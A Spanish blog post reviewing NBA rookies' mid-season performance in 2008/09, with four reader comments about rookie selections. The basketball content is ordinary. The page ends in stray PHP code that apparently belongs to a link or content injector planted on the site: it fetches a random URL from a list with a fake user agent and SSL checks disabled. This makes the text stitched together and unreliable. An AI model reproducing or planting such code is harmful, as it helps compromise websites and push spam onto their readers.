Seguimiento Rookies 2008/09 (09/01/09)

09 de January de 2009 por Viva_Dirk

Estamos a punto de alcanzar el ecuador de la temporada y ya han aparecido en escena todos los novatos a los que esperábamos. Unos como Love o Westbrook se han hecho de rogar mientras que otros como Mayo o Rose se dejaron ver ya desde el primer dia. De todos modos sigue habiendo jugadores de los que esperamos mucho más como Beasley u Oden pero por contra hay otros que superan todas las espectativas como Augustine. Vamos sin más dilación con nuestro repaso.

Oeste

Russell Westbrook: Ya es el tercer máximo anotador y segundo que más balones roba entre los novatos. Sus estadísticas de 14-4-5 son más o menos las esperadas y ha normalizado sus porcentajes. En los últimos 10 partidos promedia 17.2 puntos y 6.7 asistencias.

OJ Mayo: Sigue siendo el máximo anotador con 19.9 puntos a la vez que es el líder de unos Grizzlies que pelean los partidos contra cualquiera. Sus porcentajes siguen siendo buenos o muy buenos y deja muestras de su clase cada dia.

Rudy Fernandez: La lesión de Roy a dado a Rudy la titularidad los últimos cuatro partidos en los que ha promediado 13.5 puntos en 34 minutos de juego. Parece que no anda fino físicamente y aun así mantiene buenos números con correctos porcentajes y sin acusarlo en las pérdidas ni en su defensa. ¿Debemos exigirle más?.

Jason Thompson: Su puesto peligra con la llegada de Kevin Love pero Thompson sigue haciendo buenos partidos y disfrutando de minutos en un equipo que da lástima. Sus credenciales son 9.2 puntos y 6.7 rebotes.

Marc Gasol: Parece haber solventado de forma definiva su problema con las pérdidas de balón que se habían convertido en su punto negro. Por lo demás sigue jugando mucho y bien. 11.4 puntos, 7 rebotes y 1.1 tapones en 30 minutos.

El banco del Oeste tiene dos inquilinos, Eric Gordon con su explosión anotadora y Kevin Love con varios dobles-dobles últimamente.

Este

Derrick Rose: Sus defensores dicen que sólo ha dejado de anotar 10 puntos o más en 3 partidos durante toda la temporada, y sus críticos que son las mismas veces que ha dado 10 asistencias o más. Sea como fuere y a pesar de que la regularidad de Chicago daña su imagen, es el único que puede pelearle el rookie del año a Mayo con sus 17 puntos y 6 asistencias de promedio.

DJ Augustine: Es el 6º hombre de los Bobcats y eso siendo Larry Brown el entrenador le da mucha credibilidad. En casi 30 minutos de juego alcanza los 12.5 puntos y 4.3 asistencias pero sus porcentajes no son todo lo buenos que deberían.

Michael Beasley: Parece haberse asentado algo en su situación como suplente, pero se espera  muchísimo más de él. Personalmente creo que es un jugador egoísta y que hasta la fecha no ha jugado en ningun equipo donde no fuese el referente ofensivo. Eso sí, números sabe hacer: 13 puntos y 5 rebotes en 25 minutos de juego.

Marreese Speights: Esta sacando mucho partido a los 15 minutos que le dan en los Sixers porque en ese poco tiempo anota 7.8 puntos y captura 3.8 rebotes. La mala campaña de su equipo junto con las lesiones de Brand y la empanada de Dalembert le están dando más oportunidades de las esperadas y las está sabiendo aprovechar.

Brook Lopez: Su juego sigue creciendo a medida que avanza la temporada. Sólo tres jugadores ponen más tapones que él en toda la liga y está entre los 10 máximos reboteadores ofensivos. No parece que vaya a terminar la temporada con los 10 puntos y 8 rebotes que marcan actualmente sus estadísticas.

El banco del Este para un titular indiscutible en los Heat, Mario Chalmers y sus 10 puntos y casi 2 robos por noche.

Comenta

4 comentarios a esta entrada

  1. David dice:
    #1

    Muy buenas. No me cansaré de decirlo pero vaya, menuda generación de jugadores ha dado este draft. Mi quinteto rookie del año (de momento) sería: Rose, Mayo, Beasley, Love y Lopez o Gasol (muy igualados estos dos…)
    Por cierto, ¿alguien sabe cuantos jugadores pueden ir en el Rookie challenge del all-star?

    Un saludo

      Citar

  2. RusticoColorao dice:
    #2

    Pues van 9 jugadores por equipo, no importa la conferencia…con lo que la cosa estará complicada.

      Citar

  3. Txusma dice:
    #3

    Pues ya pueden empezar las apuestas para decidir los 9 rookies. Y no sera tarea facil dado el gran nivel que estan demostrando.
    Veo seguros a Rose, Mayo, Beasley, Westbrook, Love, Lopez y Oden, pero a partir de aqui me da que cualquiera se puede ver fuera. Jason Thompson y Marc lo tienen complicado vistos q sus posiciones estan bastante bien cubiertas y lo mismo les pasa a Augustine y Chalmers. Rudy podria entrar y jugar de 3 y el noveno entonces… pues ni idea.

      Citar

  4. MagicJohnson32 dice:
    #4

    Beasley necesita una transfusión de generosidad, que me parece que tiene el depósito a cero. Qué jugador más egoísta, buf.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>